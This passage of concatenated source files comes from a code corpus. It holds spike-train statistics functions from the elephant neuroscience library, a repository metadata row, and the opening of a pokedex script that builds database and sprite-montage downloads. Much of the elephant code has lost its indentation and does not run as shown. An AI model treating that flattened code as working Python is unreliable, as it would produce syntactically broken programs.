filter function is aligned with the spike to convolve
        Default: True
m_idx : int
index of the value in the kernel function vector that corresponds
to its gravity center. this parameter is not mandatory for
symmetrical kernels but it is required when asymmetrical kernels
        are to be aligned at their gravity center with the event times. If None,
        it is assumed to be the median value of the kernel support.
Default : None
trim : bool
if True, only the 'valid' region of the convolved
signal are returned, i.e., the points where there
isn't complete overlap between kernel and spike train
are discarded
NOTE: if True and an asymmetrical kernel is provided
the output will not be aligned with [t_start, t_stop]
Returns
-------
rate : neo.AnalogSignal
Contains the rate estimation in unit hertz (Hz).
Has a property 'rate.times' which contains the time axis of the rate
estimate. The unit of this property is the same as the resolution that
is given as an argument to the function.
Raises
------
TypeError:
If argument value for the parameter `sigma` is not a quantity object
or string 'auto'.
See also
--------
elephant.statistics.make_kernel
References
----------
..[1] H. Shimazaki, S. Shinomoto, J Comput Neurosci (2010) 29:171–182.
"""
warnings.simplefilter('always', DeprecationWarning)
warnings.warn("deprecated", DeprecationWarning, stacklevel=2)
if sigma == 'auto':
form = 'GAU'
unit = spiketrain.units
kernel_width = sskernel(spiketrain.magnitude, tin=None,
bootstrap=True)['optw']
sigma = kw2sigma(form) * kernel_width * unit
elif not isinstance(sigma, pq.Quantity):
raise TypeError('sigma must be either a quantities object or "auto".'
' Found: %s, value %s' % (type(sigma), str(sigma)))
kernel, norm, m_idx = make_kernel(form=form, sigma=sigma,
sampling_period=sampling_period)
units = pq.CompoundUnit(
"%s*s" % str(sampling_period.rescale('s').magnitude))
spiketrain = spiketrain.rescale(units)
if t_start is None:
t_start = spiketrain.t_start
else:
t_start = t_start.rescale(spiketrain.units)
if t_stop is None:
t_stop = spiketrain.t_stop
else:
t_stop = t_stop.rescale(spiketrain.units)
time_vector = np.zeros(int((t_stop - t_start)) + 1)
spikes_slice = spiketrain.time_slice(t_start, t_stop) \
if len(spiketrain) else np.array([])
for spike in spikes_slice:
index = int((spike - t_start))
time_vector[index] += 1
r = norm * scipy.signal.fftconvolve(time_vector, kernel, 'full')
if np.any(r < 0):
warnings.warn('Instantaneous firing rate approximation contains '
'negative values, possibly caused due to machine '
'precision errors')
if acausal:
if not trim:
r = r[m_idx:-(kernel.size - m_idx)]
elif trim:
r = r[2 * m_idx:-2 * (kernel.size - m_idx)]
t_start = t_start + m_idx * spiketrain.units
t_stop = t_stop - ((kernel.size) - m_idx) * spiketrain.units
else:
if not trim:
r = r[m_idx:-(kernel.size - m_idx)]
elif trim:
r = r[2 * m_idx:-2 * (kernel.size - m_idx)]
t_start = t_start + m_idx * spiketrain.units
t_stop = t_stop - ((kernel.size) - m_idx) * spiketrain.units
rate = neo.AnalogSignal(signal=r.reshape(r.size, 1),
sampling_period=sampling_period,
units=pq.Hz, t_start=t_start)
return rate, sigma
def instantaneous_rate(spiketrain, sampling_period, kernel='auto',
cutoff=5.0, t_start=None, t_stop=None, trim=False):
"""
Estimates instantaneous firing rate by kernel convolution.
Parameters
-----------
spiketrain : 'neo.SpikeTrain'
Neo object that contains spike times, the unit of the time stamps
and t_start and t_stop of the spike train.
sampling_period : Time Quantity
Time stamp resolution of the spike times. The same resolution will
be assumed for the kernel
kernel : string 'auto' or callable object of :class:`Kernel` from module
'kernels.py'. Currently implemented kernel forms are rectangular,
triangular, epanechnikovlike, gaussian, laplacian, exponential,
and alpha function.
Example: kernel = kernels.RectangularKernel(sigma=10*ms, invert=False)
The kernel is used for convolution with the spike train and its
standard deviation determines the time resolution of the instantaneous
rate estimation.
Default: 'auto'. In this case, the optimized kernel width for the
rate estimation is calculated according to [1] and with this width
a gaussian kernel is constructed. Automatized calculation of the
kernel width is not available for other than gaussian kernel shapes.
cutoff : float
This factor determines the cutoff of the probability distribution of
the kernel, i.e., the considered width of the kernel in terms of
multiples of the standard deviation sigma.
Default: 5.0
t_start : Time Quantity (optional)
Start time of the interval used to compute the firing rate. If None
assumed equal to spiketrain.t_start
Default: None
t_stop : Time Quantity (optional)
End time of the interval used to compute the firing rate (included).
If None assumed equal to spiketrain.t_stop
Default: None
trim : bool
if False, the output of the Fast Fourier Transformation being a longer
vector than the input vector by the size of the kernel is reduced back
to the original size of the considered time interval of the spiketrain
using the median of the kernel.
if True, only the region of the convolved signal is returned, where
there is complete overlap between kernel and spike train. This is
achieved by reducing the length of the output of the Fast Fourier
Transformation by a total of two times the size of the kernel, and
t_start and t_stop are adjusted.
Default: False
Returns
-------
rate : neo.AnalogSignal
Contains the rate estimation in unit hertz (Hz).
Has a property 'rate.times' which contains the time axis of the rate
estimate. The unit of this property is the same as the resolution that
is given via the argument 'sampling_period' to the function.
Raises
------
TypeError:
If `spiketrain` is not an instance of :class:`SpikeTrain` of Neo.
If `sampling_period` is not a time quantity.
If `kernel` is neither instance of :class:`Kernel` or string 'auto'.
If `cutoff` is neither float nor int.
If `t_start` and `t_stop` are neither None nor a time quantity.
If `trim` is not bool.
ValueError:
If `sampling_period` is smaller than zero.
Example
--------
    kernel = kernels.AlphaKernel(sigma=0.05*pq.s, invert=True)
    rate = instantaneous_rate(spiketrain, sampling_period=2*pq.ms, kernel=kernel)
References
----------
..[1] H. Shimazaki, S. Shinomoto, J Comput Neurosci (2010) 29:171–182.
"""
# Checks of input variables:
if not isinstance(spiketrain, SpikeTrain):
raise TypeError(
"spiketrain must be instance of :class:`SpikeTrain` of Neo!\n"
" Found: %s, value %s" % (type(spiketrain), str(spiketrain)))
if not (isinstance(sampling_period, pq.Quantity) and
sampling_period.dimensionality.simplified ==
pq.Quantity(1, "s").dimensionality):
raise TypeError(
"The sampling period must be a time quantity!\n"
" Found: %s, value %s" % (type(sampling_period), str(sampling_period)))
if sampling_period.magnitude < 0:
raise ValueError("The sampling period must be larger than zero.")
if kernel == 'auto':
kernel_width = sskernel(spiketrain.magnitude, tin=None,
bootstrap=True)['optw']
unit = spiketrain.units
sigma = 1/(2.0 * 2.7) * kernel_width * unit
# factor 2.0 connects kernel width with its half width,
# factor 2.7 connects half width of Gaussian distribution with
# 99% probability mass with its standard deviation.
kernel = kernels.GaussianKernel(sigma)
elif not isinstance(kernel, kernels.Kernel):
raise TypeError(
"kernel must be either instance of :class:`Kernel` "
"or the string 'auto'!\n"
" Found: %s, value %s" % (type(kernel), str(kernel)))
if not (isinstance(cutoff, float) or isinstance(cutoff, int)):
raise TypeError("cutoff must be float or integer!")
if not (t_start is None or (isinstance(t_start, pq.Quantity) and
t_start.dimensionality.simplified ==
pq.Quantity(1, "s").dimensionality)):
raise TypeError("t_start must be a time quantity!")
if not (t_stop is None or (isinstance(t_stop, pq.Quantity) and
t_stop.dimensionality.simplified ==
pq.Quantity(1, "s").dimensionality)):
raise TypeError("t_stop must be a time quantity!")
if not (isinstance(trim, bool)):
raise TypeError("trim must be bool!")
# main function:
units = pq.CompoundUnit("%s*s" % str(sampling_period.rescale('s').magnitude))
spiketrain = spiketrain.rescale(units)
if t_start is None:
t_start = spiketrain.t_start
else:
t_start = t_start.rescale(spiketrain.units)
if t_stop is None:
t_stop = spiketrain.t_stop
else:
t_stop = t_stop.rescale(spiketrain.units)
time_vector = np.zeros(int((t_stop - t_start)) + 1)
spikes_slice = spiketrain.time_slice(t_start, t_stop) \
if len(spiketrain) else np.array([])
for spike in spikes_slice:
index = int((spike - t_start))
time_vector[index] += 1
if cutoff < kernel.min_cutoff:
cutoff = kernel.min_cutoff
warnings.warn("The width of the kernel was adjusted to a minimally "
"allowed width.")
t_arr = np.arange(-cutoff * kernel.sigma.rescale(units).magnitude,
cutoff * kernel.sigma.rescale(units).magnitude +
sampling_period.rescale(units).magnitude,
sampling_period.rescale(units).magnitude) * units
r = scipy.signal.fftconvolve(time_vector,
kernel(t_arr).rescale(pq.Hz).magnitude, 'full')
if np.any(r < 0):
warnings.warn("Instantaneous firing rate approximation contains "
"negative values, possibly caused due to machine "
"precision errors.")
if not trim:
r = r[kernel.median_index(t_arr):-(kernel(t_arr).size -
kernel.median_index(t_arr))]
elif trim:
r = r[2 * kernel.median_index(t_arr):-2 * (kernel(t_arr).size -
kernel.median_index(t_arr))]
t_start += kernel.median_index(t_arr) * spiketrain.units
t_stop -= (kernel(t_arr).size -
kernel.median_index(t_arr)) * spiketrain.units
rate = neo.AnalogSignal(signal=r.reshape(r.size, 1),
sampling_period=sampling_period,
units=pq.Hz, t_start=t_start, t_stop=t_stop)
return rate
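# --- Hedged usage sketch (illustrative only; not part of the original module).
# Builds an explicit Gaussian kernel instead of 'auto'; the spike times, sigma
# and sampling period below are hypothetical values.
def _example_instantaneous_rate_usage():
    st = SpikeTrain([0.1, 0.5, 1.2] * pq.s, t_stop=2.0 * pq.s)
    kernel = kernels.GaussianKernel(sigma=50 * pq.ms)
    # Returns a neo.AnalogSignal sampled every 10 ms, in Hz
    return instantaneous_rate(st, sampling_period=10 * pq.ms, kernel=kernel)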
def time_histogram(spiketrains, binsize, t_start=None, t_stop=None,
output='counts', binary=False):
"""
Time Histogram of a list of :attr:`neo.SpikeTrain` objects.
Parameters
----------
spiketrains : List of neo.SpikeTrain objects
Spiketrains with a common time axis (same `t_start` and `t_stop`)
binsize : quantities.Quantity
Width of the histogram's time bins.
t_start, t_stop : Quantity (optional)
Start and stop time of the histogram. Only events in the input
`spiketrains` falling between `t_start` and `t_stop` (both included)
are considered in the histogram. If `t_start` and/or `t_stop` are not
        specified, the maximum `t_start` of all :attr:`spiketrains` is used as
`t_start`, and the minimum `t_stop` is used as `t_stop`.
Default: t_start = t_stop = None
output : str (optional)
Normalization of the histogram. Can be one of:
        * `counts`: spike counts at each bin (as integer numbers)
* `mean`: mean spike counts per spike train
* `rate`: mean spike rate per spike train. Like 'mean', but the
counts are additionally normalized by the bin width.
binary : bool (optional)
        If **True**, all spiketrain objects are first binned to a binary
        representation (using the `BinnedSpikeTrain` class
in the `conversion` module) and the calculation of the histogram is
based on this representation.
Note that the output is not binary, but a histogram of the converted,
binary representation.
Default: False
Returns
-------
time_hist : neo.AnalogSignal
A neo.AnalogSignal object containing the histogram values.
`AnalogSignal[j]` is the histogram computed between
`t_start + j * binsize` and `t_start + (j + 1) * binsize`.
See also
--------
elephant.conversion.BinnedSpikeTrain
"""
min_tstop = 0
if t_start is None:
# Find the internal range for t_start, where all spike trains are
# defined; cut all spike trains taking that time range only
max_tstart, min_tstop = conv._get_start_stop_from_input(spiketrains)
t_start = max_tstart
if not all([max_tstart == t.t_start for t in spiketrains]):
warnings.warn(
"Spiketrains have different t_start values -- "
"using maximum t_start as t_start.")
if t_stop is None:
# Find the internal range for t_stop
if min_tstop:
t_stop = min_tstop
if not all([min_tstop == t.t_stop for t in spiketrains]):
warnings.warn(
"Spiketrains have different t_stop values -- "
"using minimum t_stop as t_stop.")
else:
min_tstop = conv._get_start_stop_from_input(spiketrains)[1]
t_stop = min_tstop
if not all([min_tstop == t.t_stop for t in spiketrains]):
warnings.warn(
"Spiketrains have different t_stop values -- "
"using minimum t_stop as t_stop.")
sts_cut = [st.time_slice(t_start=t_start, t_stop=t_stop) for st in
spiketrains]
# Bin the spike trains and sum across columns
bs = conv.BinnedSpikeTrain(sts_cut, t_start=t_start, t_stop=t_stop,
binsize=binsize)
if binary:
bin_hist = bs.to_sparse_bool_array().sum(axis=0)
else:
bin_hist = bs.to_sparse_array().sum(axis=0)
# Flatten array
bin_hist = np.ravel(bin_hist)
# Renormalise the histogram
if output == 'counts':
# Raw
bin_hist = bin_hist * pq.dimensionless
elif output == 'mean':
# Divide by number of input spike trains
bin_hist = bin_hist * 1. / len(spiketrains) * pq.dimensionless
elif output == 'rate':
# Divide by number of input spike trains and bin width
bin_hist = bin_hist * 1. / len(spiketrains) / binsize
else:
raise ValueError('Parameter output is not valid.')
return neo.AnalogSignal(signal=bin_hist.reshape(bin_hist.size, 1),
sampling_period=binsize, units=bin_hist.units,
t_start=t_start)
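# --- Hedged usage sketch (illustrative only; not part of the original module).
# Pools two hypothetical spike trains (same t_start/t_stop) into 500 ms bins.
def _example_time_histogram_usage():
    sts = [SpikeTrain([0.1, 0.5, 1.2] * pq.s, t_stop=2.0 * pq.s),
           SpikeTrain([0.3, 0.9] * pq.s, t_stop=2.0 * pq.s)]
    # 'rate' normalizes the counts by the number of trains and the bin width
    return time_histogram(sts, binsize=500 * pq.ms, output='rate')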
def complexity_pdf(spiketrains, binsize):
"""
Complexity Distribution [1] of a list of :attr:`neo.SpikeTrain` objects.
Probability density computed from the complexity histogram which is the
histogram of the entries of the population histogram of clipped (binary)
spike trains computed with a bin width of binsize.
It provides for each complexity (== number of active neurons per bin) the
number of occurrences. The normalization of that histogram to 1 is the
probability density.
Parameters
----------
spiketrains : List of neo.SpikeTrain objects
Spiketrains with a common time axis (same `t_start` and `t_stop`)
binsize : quantities.Quantity
Width of the histogram's time bins.
Returns
-------
    complexity_distribution : neo.AnalogSignal
        A neo.AnalogSignal object containing the complexity distribution;
        `AnalogSignal[j]` holds the estimated probability of observing `j`
        active neurons within a bin.
See also
--------
elephant.conversion.BinnedSpikeTrain
References
----------
    ..[1] Gruen, S., Abeles, M., & Diesmann, M. (2008). Impact of higher-order
correlations on coincidence distributions of massively parallel data.
In Dynamic Brain-from Neural Spikes to Behaviors (pp. 96-114).
Springer Berlin Heidelberg.
"""
# Computing the population histogram with parameter binary=True to clip the
# spike trains before summing
pophist = time_histogram(spiketrains, binsize, binary=True)
# Computing the histogram of the entries of pophist (=Complexity histogram)
complexity_hist = np.histogram(
pophist.magnitude, bins=range(0, len(spiketrains) + 2))[0]
    # Normalization of the Complexity Histogram to 1 (probability distribution)
complexity_hist = complexity_hist / complexity_hist.sum()
# Convert the Complexity pdf to an neo.AnalogSignal
complexity_distribution = neo.AnalogSignal(
np.array(complexity_hist).reshape(len(complexity_hist), 1) *
pq.dimensionless, t_start=0 * pq.dimensionless,
sampling_period=1 * pq.dimensionless)
return complexity_distribution
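# --- Hedged usage sketch (illustrative only; not part of the original module),
# mirroring the documented call pattern. With two hypothetical trains the
# complexity per bin can only be 0, 1 or 2, so the distribution has three entries.
def _example_complexity_pdf_usage():
    sts = [SpikeTrain([0.1, 0.5, 1.2] * pq.s, t_stop=2.0 * pq.s),
           SpikeTrain([0.3, 0.9] * pq.s, t_stop=2.0 * pq.s)]
    return complexity_pdf(sts, binsize=100 * pq.ms)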
"""Kernel Bandwidth Optimization.
Python implementation by Subhasis Ray.
Original matlab code (sskernel.m) here:
http://2000.jukuin.keio.ac.jp/shimazaki/res/kernel.html
This was translated into Python by Subhasis Ray, NCBS. Tue Jun 10
23:01:43 IST 2014
"""
def nextpow2(x):
""" Return the smallest integral power of 2 that >= x """
n = 2
while n < x:
n = 2 * n
return n
def fftkernel(x, w):
"""
y = fftkernel(x,w)
Function `fftkernel' applies the Gauss kernel smoother to an input
signal using FFT algorithm.
Input argument
x: Sample signal vector.
w: Kernel bandwidth (the standard deviation) in unit of
the sampling resolution of x.
Output argument
y: Smoothed signal.
MAY 5/23, 2012 Author Hideaki Shimazaki
    RIKEN Brain Science Institute
http://2000.jukuin.keio.ac.jp/shimazaki
Ported to Python: Subhasis Ray, NCBS. Tue Jun 10 10:42:38 IST 2014
"""
L = len(x)
Lmax = L + 3 * w
n = nextpow2(Lmax)
X = np.fft.fft(x, n)
f = np.arange(0, n, 1.0) / n
f = np.concatenate((-f[:int(n / 2)], f[int(n / 2):0:-1]))
K = np.exp(-0.5 * (w * 2 * np.pi * f)**2)
y = np.fft.ifft(X * K, n)
y = y[:L].copy()
return y
def logexp(x):
if x < 1e2:
y = np.log(1 + np.exp(x))
else:
y = x
return y
def ilogexp(x):
if x < 1e2:
y = np.log(np.exp(x) - 1)
else:
y = x
return y
def cost_function(x, N, w, dt):
"""
The cost function
Cn(w) = sum_{i,j} int k(x - x_i) k(x - x_j) dx - 2 sum_{i~=j} k(x_i - x_j)
"""
yh = np.abs(fftkernel(x, w / dt)) # density
# formula for density
C = np.sum(yh ** 2) * dt - 2 * np.sum(yh * x) * \
dt + 2 / np.sqrt(2 * np.pi) / w / N
C = C * N * N
# formula for rate
# C = dt*sum( yh.^2 - 2*yh.*y_hist + 2/sqrt(2*pi)/w*y_hist )
return C, yh
def sskernel(spiketimes, tin=None, w=None, bootstrap=False):
"""
Calculates optimal fixed kernel bandwidth.
spiketimes: sequence of spike times (sorted to be ascending).
tin: (optional) time points at which the kernel bandwidth is to be estimated.
w: (optional) vector of kernel bandwidths. If specified, optimal
bandwidth is selected from this.
bootstrap (optional): whether to calculate the 95% confidence
interval. (default False)
Returns
A dictionary containing the following key value pairs:
'y': estimated density,
't': points at which estimation was computed,
'optw': optimal kernel bandwidth,
'w': kernel bandwidths examined,
'C': cost functions of w,
'confb95': (lower bootstrap confidence level, upper bootstrap confidence level),
'yb': bootstrap samples.
Ref: Shimazaki, Hideaki, and Shigeru Shinomoto. 2010. Kernel
Bandwidth Optimization in Spike Rate Estimation. Journal of
Computational Neuroscience 29 (1-2):
171-82. doi:10.1007/s10827-009-0180-4.
"""
if tin is None:
time = np.max(spiketimes) - np.min(spiketimes)
isi = np.diff(spiketimes)
isi = isi[isi > 0].copy()
dt = np.min(isi)
tin = np.linspace(np.min(spiketimes),
np.max(spiketimes),
min(int(time / dt + 0.5), 1000)) # The 1000 seems somewhat arbitrary
t = tin
else:
time = np.max(tin) - np.min(tin)
spiketimes = spiketimes[(spiketimes >= np.min(tin)) &
(spiketimes <= np.max(tin))].copy()
isi = np.diff(spiketimes)
isi = isi[isi > 0].copy()
dt = np.min(isi)
if dt > np.min(np.diff(tin)):
t = np.linspace(np.min(tin), np.max(tin),
min(int(time / dt + 0.5), 1000))
else:
t = tin
dt = np.min(np.diff(tin))
yhist, bins = np.histogram(spiketimes, np.r_[t - dt / 2, t[-1] + dt / 2])
N = np.sum(yhist)
yhist = yhist / (N * dt) # density
optw = None
y = None
if w is not None:
C = np.zeros(len(w))
Cmin = np.inf
for k, w_ in enumerate(w):
C[k], yh = cost_function(yhist, N, w_, dt)
if C[k] < Cmin:
Cmin = C[k]
optw = w_
y = yh
else:
# Golden section search on a log-exp scale
wmin = 2 * dt
wmax = max(spiketimes) - min(spiketimes)
imax = 20 # max iterations
w = np.zeros(imax)
C = np.zeros(imax)
tolerance = 1e-5
phi = 0.5 * (np.sqrt(5) + 1) # The Golden ratio
a = ilogexp(wmin)
b = ilogexp(wmax)
c1 = (phi - 1) * a + (2 - phi) * b
c2 = (2 - phi) * a + (phi - 1) * b
f1, y1 = cost_function(yhist, N, logexp(c1), dt)
f2, y2 = cost_function(yhist, N, logexp(c2), dt)
k = 0
while (np.abs(b - a) > (tolerance * (np.abs(c1) + np.abs(c2))))\
and (k < imax):
if f1 < f2:
b = c2
c2 = c1
c1 = (phi - 1) * a + (2 - phi) * b
f2 = f1
f1, y1 = cost_function(yhist, N, logexp(c1), dt)
w[k] = logexp(c1)
C[k] = f1
optw = logexp(c1)
y = y1 / (np.sum(y1 * dt))
else:
a = c1
c1 = c2
c2 = (2 - phi) * a + (phi - 1) * b
f1 = f2
f2, y2 = cost_function(yhist, N, logexp(c2), dt)
w[k] = logexp(c2)
C[k] = f2
optw = logexp(c2)
y = y2 / np.sum(y2 * dt)
k = k + 1
# Bootstrap confidence intervals
confb95 = None
yb = None
if bootstrap:
nbs = 1000
yb = np.zeros((nbs, len(tin)))
for ii in range(nbs):
idx = np.floor(np.random.rand(N) * N).astype(int)
xb = spiketimes[idx]
            y_histb, bins = np.histogram(
                xb, np.r_[t - dt / 2, t[-1] + dt / 2])
            y_histb = y_histb / dt / N
yb_buf = fftkernel(y_histb, optw / dt).real
yb_buf = yb_buf / np.sum(yb_buf * dt)
yb[ii, :] = np.interp(tin, t, yb_buf)
ybsort = np.sort(yb, axis=0)
y95b = ybsort[np.floor(0.05 * nbs).astype(int), :]
y95u = ybsort[np.floor(0.95 * nbs).astype(int), :]
confb95 = (y95b, y95u)
ret = np.interp(tin, t, y)
return {'y': ret,
't': tin,
'optw': optw,
'w': w,
'C': C,
'confb95': confb95,
'yb': yb}
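# --- Hedged usage sketch (illustrative only; not part of the original module).
# Optimizes the Gaussian bandwidth for a small set of synthetic spike times;
# the returned 'optw' is in the same (unitless) time base as the input.
def _example_sskernel_usage():
    spiketimes = np.sort(np.random.rand(100)) * 10.0  # 100 spikes in [0, 10)
    return sskernel(spiketimes)['optw']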
|
etorre/elephant
|
elephant/statistics.py
|
Python
|
bsd-3-clause
| 42,361
|
[
"Gaussian",
"NEURON"
] |
baa43cc7d84d723b9ce8a3491ccafd021b728e62f5f0b90bbd2c20f1833aaf94
|
#!/usr/bin/env python
# encoding: utf8
"""Script to create a bunch of tarballs and montages, made available on the
/dex/downloads page.
"""
from __future__ import division
from glob import glob
import math
import os, os.path
import pkg_resources
import re
import subprocess
from subprocess import PIPE
import sys
import tarfile
import gzip
from pokedex.db import connect
from pokedex.db.load import load
phi = (1 + 5 ** 0.5) / 2
# Find the spline-pokedex downloads dir as relative to this script; it's not a
# data dir, so pkg_resources isn't much help
this_dir, _ = os.path.split(__file__)
downloads_dir = os.path.abspath(
os.path.join(this_dir, '../splinext/pokedex/public/downloads')
)
# TODO this is stupid
media_dir = os.path.abspath(
os.path.join(this_dir, '../../pokedex-media.git')
)
assert media_dir
def create_downloads():
# Gotta chdir to get the gzip header right; see Python bug 4750
os.chdir(downloads_dir)
# The database
db_filename = os.path.join(downloads_dir, 'veekun-pokedex.sqlite')
session = connect('sqlite:///' + db_filename)
load(session, drop_tables=True, verbose=True, safe=False)
session.close()
db_gz = gzip.open(db_filename + '.gz', 'wb')
with open(db_filename, 'rb') as source:
db_gz.write(source.read())
db_gz.close() # XXX: 'with' context manager support is in Python 2.7
os.unlink(db_filename)
# Per-generation Pokémon tarballs
main_tarball('generation-1.tar.gz', ['red-green', 'red-blue', 'yellow'])
main_tarball('generation-2.tar.gz', ['gold', 'silver', 'crystal'])
main_tarball('generation-3.tar.gz', ['ruby-sapphire', 'emerald', 'firered-leafgreen'])
main_tarball('generation-4.tar.gz', ['diamond-pearl', 'platinum', 'heartgold-soulsilver'])
main_tarball('generation-5.tar.gz', ['black-white'])
# Other Pokémon stuff
make_tarball('overworld.tar.gz', ['pokemon/overworld'])
make_tarball('pokemon-cries.tar.gz', ['pokemon/cries'])
make_tarball('pokemon-sugimori.tar.gz', ['pokemon/sugimori'])
make_tarball('pokemon-footprints.tar.gz', ['pokemon/footprints'])
make_tarball('pokemon-trozei.tar.gz', ['pokemon/trozei'])
make_tarball('pokemon-icons.tar.gz', ['pokemon/icons'])
make_tarball('pokemon-conquest.tar.gz', ['pokemon/conquest'])
make_tarball('pokemon-dream-world.tar.gz', ['pokemon/dream-world'])
make_tarball('pokemon-global-link.tar.gz', ['pokemon/global-link'])
# Not Pokémon at all!
make_tarball('chrome.tar.gz', ['chrome', 'ribbons'])
make_tarball('items.tar.gz', ['items'])
# Bunch o' montages
main_montage('red-green.png', 'red-green/gray/{0}.png', 56, 151)
main_montage('red-green-sgb.png', 'red-green/{0}.png', 56, 151)
main_montage('red-blue.png', 'red-blue/gray/{0}.png', 56, 151)
main_montage('red-blue-sgb.png', 'red-blue/{0}.png', 56, 151)
main_montage('yellow.png', 'yellow/gray/{0}.png', 56, 151)
main_montage('yellow-sgb.png', 'yellow/{0}.png', 56, 151)
main_montage('yellow-gbc.png', 'yellow/gbc/{0}.png', 56, 151)
main_montage('generation-1-back.png',
'red-blue/back/gray/{0}.png', 32, 151)
main_montage('red-green-blue-back-sgb.png',
'red-blue/back/{0}.png', 32, 151)
main_montage('yellow-back-sgb.png', 'yellow/back/{0}.png', 32, 151)
main_montage('yellow-back-gbc.png', 'yellow/back/gbc/{0}.png', 32, 151)
main_montage('gold.png', 'gold/{0}.png', 56, 251)
main_montage('gold-shiny.png', 'gold/shiny/{0}.png', 56, 251)
main_montage('silver.png', 'silver/{0}.png', 56, 251)
main_montage('silver-shiny.png', 'silver/shiny/{0}.png', 56, 251)
main_montage('crystal.png', 'crystal/{0}.png', 56, 251)
main_montage('crystal-shiny.png', 'crystal/shiny/{0}.png', 56, 251)
main_montage('gold-silver-back.png',
'silver/back/{0}.png', 48, 251)
main_montage('gold-silver-back-shiny.png',
'silver/back/shiny/{0}.png', 48, 251)
main_montage('crystal-back.png',
'crystal/back/{0}.png', 48, 251)
main_montage('crystal-back-shiny.png',
'crystal/back/shiny/{0}.png', 48, 251)
main_montage('generation-3.png',
'ruby-sapphire/{0}.png', 64, 386, transparent=True)
main_montage('generation-3-shiny.png',
'ruby-sapphire/shiny/{0}.png', 64, 386, transparent=True)
main_montage('emerald-frame2.png',
'emerald/frame2/{0}.png', 64, 386, transparent=True)
main_montage('emerald-frame2-shiny.png',
'emerald/shiny/frame2/{0}.png', 64, 386, transparent=True)
main_montage('firered-leafgreen.png',
'firered-leafgreen/{0}.png', 64, 151, transparent=True)
main_montage('firered-leafgreen-shiny.png',
'firered-leafgreen/shiny/{0}.png', 64, 151, transparent=True)
main_montage('generation-3-back.png',
'ruby-sapphire/back/{0}.png', 64, 386, transparent=True)
main_montage('generation-3-back-shiny.png',
'ruby-sapphire/back/shiny/{0}.png', 64, 386, transparent=True)
main_montage('firered-leafgreen-back.png',
'firered-leafgreen/back/{0}.png', 64, 151, transparent=True)
main_montage('firered-leafgreen-back-shiny.png',
'firered-leafgreen/back/shiny/{0}.png', 64, 151, transparent=True)
main_montage('diamond-pearl.png',
'diamond-pearl/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-shiny.png',
'diamond-pearl/shiny/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-frame2.png',
'diamond-pearl/frame2/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-shiny-frame2.png',
'diamond-pearl/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('platinum.png',
'platinum/{0}.png', 80, 493, transparent=True)
main_montage('platinum-shiny.png',
'platinum/shiny/{0}.png', 80, 493, transparent=True)
main_montage('platinum-frame2.png',
'platinum/frame2/{0}.png', 80, 493, transparent=True)
main_montage('platinum-shiny-frame2.png',
'platinum/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver.png',
'heartgold-soulsilver/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-shiny.png',
'heartgold-soulsilver/shiny/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-frame2.png',
'heartgold-soulsilver/frame2/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-shiny-frame2.png',
'heartgold-soulsilver/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-back.png',
'diamond-pearl/back/{0}.png', 80, 493, transparent=True)
main_montage('diamond-pearl-back-shiny.png',
'diamond-pearl/back/shiny/{0}.png', 80, 493, transparent=True)
main_montage('platinum-back.png',
'platinum/back/{0}.png', 80, 493, transparent=True)
main_montage('platinum-back-shiny.png',
'platinum/back/shiny/{0}.png', 80, 493, transparent=True)
main_montage('platinum-back-frame2.png',
'platinum/back/frame2/{0}.png', 80, 493, transparent=True)
main_montage('platinum-back-shiny-frame2.png',
'platinum/back/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-back.png',
'heartgold-soulsilver/back/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-back-shiny.png',
'heartgold-soulsilver/back/shiny/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-back-frame2.png',
'heartgold-soulsilver/back/frame2/{0}.png', 80, 493, transparent=True)
main_montage('heartgold-soulsilver-back-shiny-frame2.png',
'heartgold-soulsilver/back/shiny/frame2/{0}.png', 80, 493, transparent=True)
main_montage('black-white.png',
'black-white/{0}.png', 96, 649, transparent=True)
main_montage('black-white-shiny.png',
'black-white/shiny/{0}.png', 96, 649, transparent=True)
main_montage('black-white-back.png',
'black-white/back/{0}.png', 96, 649, transparent=True)
main_montage('black-white-back-shiny.png',
'black-white/back/shiny/{0}.png', 96, 649, transparent=True)
# And female montages, which are a little different
make_diff_montage(
filename='diamond-pearl-female-diff.png',
other_filename='diamond-pearl.png',
pattern='pokemon/main-sprites/diamond-pearl/female/{0}.png',
fallback_pattern='pokemon/main-sprites/diamond-pearl/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='platinum-female-diff.png',
other_filename='platinum.png',
pattern='pokemon/main-sprites/platinum/female/{0}.png',
fallback_pattern='pokemon/main-sprites/platinum/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='heartgold-soulsilver-female-diff.png',
other_filename='heartgold-soulsilver.png',
pattern='pokemon/main-sprites/heartgold-soulsilver/female/{0}.png',
fallback_pattern='pokemon/main-sprites/heartgold-soulsilver/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='black-white-female-diff.png',
other_filename='black-white.png',
pattern='pokemon/main-sprites/black-white/female/{0}.png',
fallback_pattern='pokemon/main-sprites/black-white/{0}.png',
sprite_size=96,
pokemon=649,
)
make_diff_montage(
filename='diamond-pearl-back-female-diff.png',
other_filename='diamond-pearl-back.png',
pattern='pokemon/main-sprites/diamond-pearl/back/female/{0}.png',
fallback_pattern='pokemon/main-sprites/diamond-pearl/back/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='platinum-back-female-diff.png',
other_filename='platinum-back.png',
pattern='pokemon/main-sprites/platinum/back/female/{0}.png',
fallback_pattern='pokemon/main-sprites/platinum/back/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='heartgold-soulsilver-back-female-diff.png',
other_filename='heartgold-soulsilver-back.png',
pattern='pokemon/main-sprites/heartgold-soulsilver/back/female/{0}.png',
fallback_pattern='pokemon/main-sprites/heartgold-soulsilver/back/{0}.png',
sprite_size=80,
pokemon=493,
)
make_diff_montage(
filename='black-white-back-female-diff.png',
